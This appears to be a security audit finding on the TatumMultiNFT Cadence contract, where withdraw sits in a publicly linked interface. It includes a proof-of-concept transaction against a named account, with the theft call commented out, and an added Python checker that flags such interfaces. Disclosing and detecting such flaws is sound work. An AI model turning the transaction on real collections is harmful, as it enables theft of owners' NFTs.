// line 36
pub resource interface TatumMultiNftCollectionPublic {
    pub fun withdraw(withdrawID: UInt64): @NonFungibleToken.NFT

In line 156, the withdraw functionality is exposed in the TatumMultiNftCollectionPublic resource interface. Since the TatumMultiNftCollectionPublic interface is used to expose certain functions inside the Collection resource publicly, an attacker can steal all NFTs by borrowing the public capability situated under CollectionPublicPath and calling the withdraw function.

Below is example transaction code that illustrates the attack.

import TatumMultiNFT from 0x354e6721564ccd2c

transaction() {
    execute {
        let account = getAccount(0xac3ac01b20852170)
        // Borrow the collection through its public capability; no signature from the owner is needed
        let cap = account.getCapability<&{TatumMultiNFT.TatumMultiNftCollectionPublic}>(TatumMultiNFT.CollectionPublicPath).borrow()!
        let availableNFTs = cap.getIDs()
        for nft in availableNFTs {
            // withdraw is reachable through the public interface (call left commented out)
            // let res <- cap.withdraw(withdrawID: nft)
        }
    }
}

Consider removing the withdraw functionality in line 36.

fix vulnerability · tatumio/flow-contracts@ebf2cdd
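
A static check for this class of bug, as an added example that is not part of the original finding or the Tatum repository: it scans Cadence source for resource interfaces linked at a public path and reports every function in them that returns a resource, which generalizes beyond withdraw. The sample contract, its names and the public-path heuristic are constructed assumptions.

```python
import re

# Constructed Cadence sample modelled on the finding; all names here are made up.
VULNERABLE = """
pub contract ExampleNFT {
    pub resource interface ExampleCollectionPublic {
        pub fun deposit(token: @NonFungibleToken.NFT)
        pub fun getIDs(): [UInt64]
        pub fun withdraw(withdrawID: UInt64): @NonFungibleToken.NFT
    }
    init() {
        self.account.link<&{ExampleCollectionPublic}>(
            /public/exampleCollection, target: /storage/exampleCollection)
    }
}
"""
# The same source with the withdraw declaration removed, as the finding recommends.
FIXED = "\n".join(l for l in VULNERABLE.splitlines() if "pub fun withdraw" not in l)

IFACE = re.compile(r"pub\s+resource\s+interface\s+(\w+)\s*\{")
# A function whose return type starts with '@' hands a resource to its caller.
RES_FUN = re.compile(r"pub\s+fun\s+(\w+)\s*\([^)]*\)\s*:\s*@")
LINK = re.compile(r"\.link<&[\w.]*\{([^}]*)\}>\s*\(\s*([^,]+),")

def interface_bodies(src):
    """Map each resource interface name to its body, found by brace matching."""
    bodies = {}
    for m in IFACE.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        bodies[m.group(1)] = src[m.end():i - 1]
    return bodies

def publicly_linked(src):
    """Interfaces in restricted types linked at a public path (heuristic: a
    /public/ literal or a path expression whose name contains 'Public')."""
    names = set()
    for m in LINK.finditer(src):
        if "/public/" in m.group(2) or "Public" in m.group(2):
            names.update(n.strip().split(".")[-1] for n in m.group(1).split(","))
    return names

def find_exposed_resource_functions(src):
    """Sorted (interface, function) pairs that let any caller take a resource."""
    bodies, linked = interface_bodies(src), publicly_linked(src)
    return sorted((name, fn) for name in bodies.keys() & linked
                  for fn in RES_FUN.findall(bodies[name]))
```

Run in CI over contract sources, a non-empty result from find_exposed_resource_functions marks an interface to review before deployment; the path test is a heuristic and does not resolve path variables.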